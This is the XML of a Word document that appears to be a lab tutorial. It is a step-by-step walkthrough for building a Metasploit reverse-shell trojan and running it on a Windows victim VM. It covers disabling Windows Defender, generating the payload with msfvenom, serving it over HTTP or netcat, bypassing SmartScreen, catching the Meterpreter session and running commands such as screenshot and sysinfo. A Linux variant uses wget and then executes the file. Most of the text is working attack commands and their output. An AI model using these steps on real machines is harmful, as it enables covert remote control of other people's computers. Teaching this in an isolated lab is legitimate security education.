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18836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How to Test trojan.exe on a Target VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E534A51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Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57094C" w14:textId="04DF616E" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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Previously, we</w:t>
      </w:r>
      <w:r w:rsidR="0016177F"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created </w:t>
      </w:r>
      <w:r w:rsidR="0016177F" w:rsidRPr="0016177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trojan.exe</w:t>
      </w:r>
      <w:r w:rsidR="0016177F"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Kali Linux, but it's a </w:t>
      </w:r>
      <w:r w:rsidR="0016177F"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Windows executable</w:t>
      </w:r>
      <w:r w:rsidR="0016177F"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(.exe). Kali Linux is Linux-based, so it can't run .exe files directly!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C9CD4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Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E919EE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need a </w:t>
      </w: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Windows VM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your "victim" machine to run the trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719479AD" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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13E3B4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80CE738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Option 1: Using a Windows VM (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520F3578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You Need:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C832C8A" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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Kali Linux VM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(attacker) - You already have this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F506BD8" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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Windows 10/11 VM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(victim) - You need to set this up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4622C6" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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B74F3E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CB0CF96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Step-by-Step Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4618762C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Get a Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A572B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Free and Legal Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776ED6A6" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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Microsoft Evaluation VMs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(FREE - 90 days): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D89D3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Download from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="001617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https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="580D56AB" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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VirtualBox or VMware version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C2B112" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Pre-built, ready to use!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FB5F0" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="00161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Windows 10 ISO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(FREE): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC38D15" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Download from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001617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https://www.microsoft.com/software-download/windows10ISO</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C0830C0" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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 in VirtualBox/VMware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71431295" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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 without activation for testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352CE05B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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0BDA7F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5A7D136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Configure Network (VERY IMPORTANT!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211C966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Both VMs must be on the same internal network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F684484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In VirtualBox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E195C76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Kali Linux VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCF2E8" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Settings → Network → Adapter 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF9888" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Attached to: </w:t>
      </w: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Internal Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B62C3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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labnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958A602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Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E58C64" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Settings → Network → Adapter 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947C74B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Attached to: </w:t>
      </w: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Internal Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B588D3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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labnet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(same name!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4ED4CE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VMware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746A79F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Both VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C994EDD" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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VM → Settings → Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10732E6F" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Select: </w:t>
      </w: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Custom: VMnet1 (Host-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC90A01" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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6E2117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4918C40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3: Set IP Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE3C75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Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532219BD" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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5E423B34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sudo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ifconfig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eth0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.100.10 netmask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255.255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.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE62809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 permanently via GUI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719ABB8E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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network icon → Wired Settings → IPv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A3211" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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to Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF9D33" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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IP: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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192.168.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3EA45E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Netmask: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3460EB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Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26770F1C" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Settings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 &amp; Internet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Ethernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B62B0" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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 adapter options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55D8A6" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Right-click your adapter → </w:t>
      </w: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Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65228E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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</w:t>
      </w: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Internet Protocol Version 4 (TCP/IPv4)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Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBA204" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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</w:t>
      </w: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the following IP address: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2B333D1" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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IP address: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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192.168.100.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7B3E4" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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Subnet mask: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CF8EF" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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 gateway: (leave blank)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86D11F" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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DNS: (leave blank)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52118C78" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646BB41" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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</w:r>
      <w:r w:rsidR="0011470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9C4CE6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28A500D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4: Test Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DFFB3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From Kali, ping Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B77554" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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631D08BB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ping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.100.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4D961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From Windows Command Prompt, ping Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45744A36" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FC9B8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ping 192.168.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA51FD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both work, your network is ready!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32282EF4" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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E3047C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A9E0A86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5: Disable Windows Defender (Temporarily!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06A640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Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624AA7D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Windows Security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(search in Start menu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD2A98" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Virus &amp; threat protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947D0FF" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Manage settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329C74B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Turn </w:t>
      </w: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OFF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74CF3700" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DE207" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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Cloud-delivered protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14550E06" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="0016177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sample submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07A9BD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Remember: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We'll turn this back ON later for detection testing!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27077BEC" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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D3D58E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529D26A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6: Create Your Trojan (on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A29DE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the Windows VM's perspective - trojan calls YOUR Kali IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4D8B4" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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041A4DEE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msfvenom -p windows/meterpreter/reverse_tcp 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LHOST=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.100.10 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LPORT=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4444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-f exe -o trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C6374" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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588930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1F01143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7: Transfer Trojan to Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D3130E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Method 1: Python Web Server (Easiest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098ECE8A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Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46963E6D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5C194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cd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~/malware_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65400668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python3 -m http.server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8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442B419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Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0407A2" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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browser (Edge/Chrome)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5C8EA" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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to: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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http://192.168.100.10:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219849D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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on </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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trojan.exe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download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78013913" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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to Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F77706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Method 2: Shared Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E1B63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VirtualBox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D889E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Windows VM Settings → Shared Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF05B8" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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folder from your host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B2209" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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"Auto-mount"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156583F9" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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 via </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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\\vboxsvr\sharename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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284A39F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VMware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586057E" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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VM → Settings → Options → Shared Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DA0FE" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11661189" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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via Network locations in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB5F68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Method 3: Netcat Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647D9D2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Kali (sender):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C1A3D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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7D0784E7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nc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-lvp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5555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trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24827D98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Windows (receiver) - need netcat installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18E472" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00B40A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nc 192.168.100.10 5555 &gt; trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907E089" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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37E1A3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E3DE02F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8: Start Listener on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CE1A94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Kali Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDE7FBF" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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51D7B660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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7C619B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 for it to load, then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB96441" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C47EF7F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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBCBD4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set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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1587650D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set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LHOST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.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C5FD2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set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LPORT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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534A253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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F443C57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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBCEEA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40CDC3C5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You should see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DC3176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`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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A624DFE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*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]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 xml:space="preserve"> Started reverse TCP handler on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.100.10:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856BFBE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`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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306DE40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29890B67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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09873335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22C421FE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### Step 9: Execute Trojan on Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958C76B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DE72BEA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**On Windows VM:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C73E4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6F46E165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. Navigate to where you saved `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trojan.exe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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D41CB4B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. **Double-click** `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trojan.exe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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020A96E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7010A8BD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**You might see:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A265B50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 xml:space="preserve">- Windows SmartScreen warning → Click </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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"More info"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 xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177F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"Run anyway"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C89E142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 xml:space="preserve">- Nothing visible happens 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that's normal - trojans hide!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1093689C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0220F507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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564C48A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45D4C86A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### Step 10: Check Your Kali Listener!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1952AB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9851A86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**On Kali, you should see:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62576D8E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`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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12C97C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[*] Sending stage (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175174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bytes) to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.100.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC87F47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[*] Meterpreter session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opened (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.100.10:4444 -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.100.20:49234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7897C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DF2007C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meterpreter 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14:paraId="280975DB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🎉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SUCCESS! You now have control of the Windows VM!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB201D" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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7C158B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60BABEF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Step 11: Test Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFE0E4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Now try these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3686B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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29F97F54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System information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639684AB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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C7515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7BD45BC0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Current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0CCA3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getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114754AC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7887FA96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Current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A53DDD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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4542F404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4982827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List files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C492CD2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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E494729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4C3BC5B0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Take screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BC9F4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screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F6763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6CCE2152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Network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE13742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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11AB2D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9E0D322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Running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110ADDF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ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB1AC8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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F2B2C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10D7F986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**Example output:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C488B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`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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C7E58C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meterpreter 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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDF8A9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Computer       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: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DESKTOP-ABC123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF94C35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OS             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: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Windows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10.0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Build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19041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2FED3471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Architecture   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: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x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01ACD1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System Language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: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en_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F98A0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Meterpreter    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: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x86/windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F3600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73E76BD9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meterpreter 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getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10215979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Server username: DESKTOP-ABC123\Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A723153" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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F7489E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9DB2A19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Step 12: Clean Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EADEF8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Exit Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78789A6B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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45C90244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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B68CD3C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Kill all sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E964B2B" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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36CE7854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sessions -K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB01D6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Exit Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B247FC" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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4D804ED6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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5D3BBC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Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C98CE3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Delete </w:t>
      </w:r>
      <w:r w:rsidRPr="0016177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trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EC863" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Re-enable Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA7BB2" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Restore from snapshot (recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF82DB7" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="00114704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1470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4DAD8E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EFE74FC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Option 2: Using Metasploitable VM (Limited)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAC788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Metasploitable is Linux-based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so it can't run Windows .exe files directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E257A08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However, you can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC765A3" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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a Linux payload instead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22930B2A" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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7E2001C7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msfvenom -p linux/x86/meterpreter/reverse_tcp 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LHOST=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.100.10 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LPORT=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4444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-f elf -o trojan_linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF11FFD" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F" w:rsidP="001617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Transfer to Metasploitable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964E794" w14:textId="77777777" w:rsidR="0016177F" w:rsidRPr="0016177F" w:rsidRDefault="0016177F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6F14FB38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On Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6871C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python3 -m http.server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8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA0914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142AF7D2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On Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71E591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lastRenderedPageBreak/>
        <w:t>wget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http://192.168.100.10:8080/trojan_linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80C0F1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chmod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+x trojan_linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976D283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./trojan_linux</w:t>
      </w:r>
    </w:p>
